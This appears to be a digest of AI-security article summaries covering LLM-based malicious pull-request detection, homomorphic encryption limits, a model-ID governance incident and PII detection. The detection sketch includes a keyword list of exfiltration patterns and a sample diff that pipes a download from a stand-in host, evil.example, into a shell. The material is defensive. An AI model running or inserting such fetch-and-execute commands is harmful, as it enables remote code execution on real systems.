
The Shift to Continuous Context and the Rise of Guardian Agents

AI agent risk doesn’t emerge in a single moment. It develops over time across configuration changes, runtime behavior, long-horizon tasks, and interactions between agents, users, and enterprise systems. An agent’s behavior and exposure can shift in real time as it rewrites instructions, updates memory, and dynamically alters its own execution.

BewAIre: Detecting Malicious Pull Requests at Scale with LLMs

As AI coding assistants accelerate software development, the volume of pull requests at Datadog has grown to nearly 10,000 per week, increasing the risk that malicious changes slip through due to review fatigue. To address this, Datadog built BewAIre, an LLM-powered code review system designed to identify malicious source code changes introduced by threat actors. By reducing approval fatigue for developers while increasing friction for attackers, BewAIre guides human reviewers to the areas where judgment matters most, without slowing developer velocity.
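BewAIre’s internals aren’t public, so the following is a minimal sketch of the general pattern such a system follows: prompt an LLM with a diff, ask for a verdict, and route suspicious changes to human reviewers. The prompt, the `llm_complete` stub, and all function names here are illustrative stand-ins, not Datadog’s implementation.

```python
# Hypothetical sketch of an LLM-based pull-request triage gate.
# All names and the model call are stand-ins, not BewAIre's actual code.

RISK_PROMPT = """You are a security reviewer. Given this diff, answer
SUSPICIOUS or BENIGN, then give one sentence of justification.

Diff:
{diff}
"""

def llm_complete(prompt: str) -> str:
    """Stub for a real LLM call (a production system would hit a model
    endpoint here). The stub flags a few well-known exfiltration and
    code-execution patterns purely for demonstration."""
    lowered = prompt.lower()
    if any(s in lowered for s in ("curl http", "base64 -d", "eval(")):
        return "SUSPICIOUS: diff contains a common exfiltration/execution pattern."
    return "BENIGN: no obvious malicious indicators."

def triage_pull_request(diff: str) -> dict:
    """Return a routing decision: escalate suspicious diffs to a human,
    let clearly benign ones flow through without added friction."""
    verdict = llm_complete(RISK_PROMPT.format(diff=diff))
    return {
        "needs_human_review": verdict.startswith("SUSPICIOUS"),
        "rationale": verdict,
    }

decision = triage_pull_request("+ os.system('curl http://evil.example | sh')")
```

The design point is the routing decision, not the classifier: the LLM never blocks a merge on its own, it only concentrates human attention where judgment matters.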

Homomorphic Encryption in LLM Pipelines: Why It Fails in 2026

There’s a claim gaining traction in the market: homomorphic encryption can preserve data privacy in AI workflows. Encrypt your data, run it through a language model, and never expose a single token. Sounds bulletproof. It isn’t. Homomorphic encryption (HE) was built for math, not language. Applying it to LLM pipelines is like encrypting a book and asking someone to summarize it without reading a word. The problem isn’t efficiency.
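The “built for math, not language” point can be made concrete with a toy additive scheme (a one-time-pad-style construction used only for illustration; it is not secure under key reuse and is not a real HE library such as a lattice-based scheme). Sums of ciphertexts decrypt to sums of plaintexts, but no analogous ciphertext operation corresponds to “summarize this text”:

```python
# Toy additively homomorphic scheme, for illustration only.
# NOT secure for reuse and NOT representative of production HE libraries.
import secrets

MODULUS = 2**61 - 1  # arbitrary large modulus for the demo

def keygen() -> int:
    return secrets.randbelow(MODULUS)

def encrypt(key: int, m: int) -> int:
    return (m + key) % MODULUS

def decrypt(key: int, c: int) -> int:
    return (c - key) % MODULUS

# Additive homomorphism: E(a) + E(b) decrypts to a + b under key ka + kb.
ka, kb = keygen(), keygen()
ca, cb = encrypt(ka, 20), encrypt(kb, 22)
total = decrypt((ka + kb) % MODULUS, (ca + cb) % MODULUS)  # → 42

# An LLM operation like "summarize this document" is not a sum or a
# product over ciphertexts, so the homomorphic property buys nothing:
# the model would have to evaluate its entire forward pass under
# encryption, token by token, to keep the plaintext hidden.
```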

Moonshot AI governance breakdown: Lessons from the Cursor/Kimi K2.5 incident

What happens when a $29 billion company forgets to rename a model ID, and what it means for every organization using open-source AI. On March 19, 2025, Cursor, the AI-powered coding tool valued at $29 billion and generating an estimated $2 billion in annual recurring revenue, launched Composer 2, its newest and most powerful coding model.

Why NER models fail at PII detection in LLM workflows - 7 critical gaps

In AI systems, PII detection is the first step. Not the most glamorous step, but the one that, when it fails, takes everything else down with it. Identifying sensitive data (names, Social Security numbers, financial records, health information) has to happen before any of it reaches an LLM. Get this wrong and the failure compounds downstream. Traditional DLP systems could afford to be aggressive with detection; LLMs can’t, because they depend on full context to generate correct outputs.
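A small sketch shows why the legacy trade-off breaks down in LLM workflows. The redactor below is a hypothetical stand-in (not any specific DLP product or NER model): pattern-based over-matching correctly strips the SSN but also destroys benign context the model needs to answer the question at all.

```python
# Hypothetical aggressive pattern-based redactor, for illustration only.
import re

SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
# Deliberately over-broad date pattern: it also hits harmless invoice dates.
DATE_RE = re.compile(r"\b\d{2}/\d{2}/\d{4}\b")

def aggressive_redact(text: str) -> str:
    """Legacy-DLP-style behavior: match patterns, replace blindly."""
    text = SSN_RE.sub("[REDACTED]", text)
    return DATE_RE.sub("[REDACTED]", text)

prompt = "Invoice 4471 dated 03/15/2024 for claimant SSN 123-45-6789 is overdue."
print(aggressive_redact(prompt))
# The SSN redaction is correct, but the invoice date, which the LLM
# needs to reason about whether the invoice is overdue, is destroyed too.
```

For a traditional DLP gate, the false positive on the date costs nothing; for an LLM prompt, it removes exactly the context the model needs.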

Has AI structurally changed the cyber industry forever? #cybersecurity #podcast #ai

On this week's episode of The Cybersecurity Defenders Podcast, Stel Valavanis, founder of onShore Networks, argues that AI is a significant milestone but does not change where security is headed. He puts AI alongside the Internet and TCP/IP and makes the case that the path forward is clear: fully embrace it as a tool, regardless of which side of the equation you are on. He also points out that agentic and automated AI was already being deployed well before LLMs arrived.

Meet Eeva, the new video agent in the Brivo Eagle Eye VMS

The world of video surveillance is moving beyond simple recording toward true intelligence. To get an inside look at our latest breakthrough in AI video surveillance technology, we sat down with Kyle Perkuhn, Sr. Product Marketing Manager at Brivo, to discuss Eeva. Unlike traditional systems, which can only spot a person or a car, Eeva lets you use natural language to define exactly what matters to your business.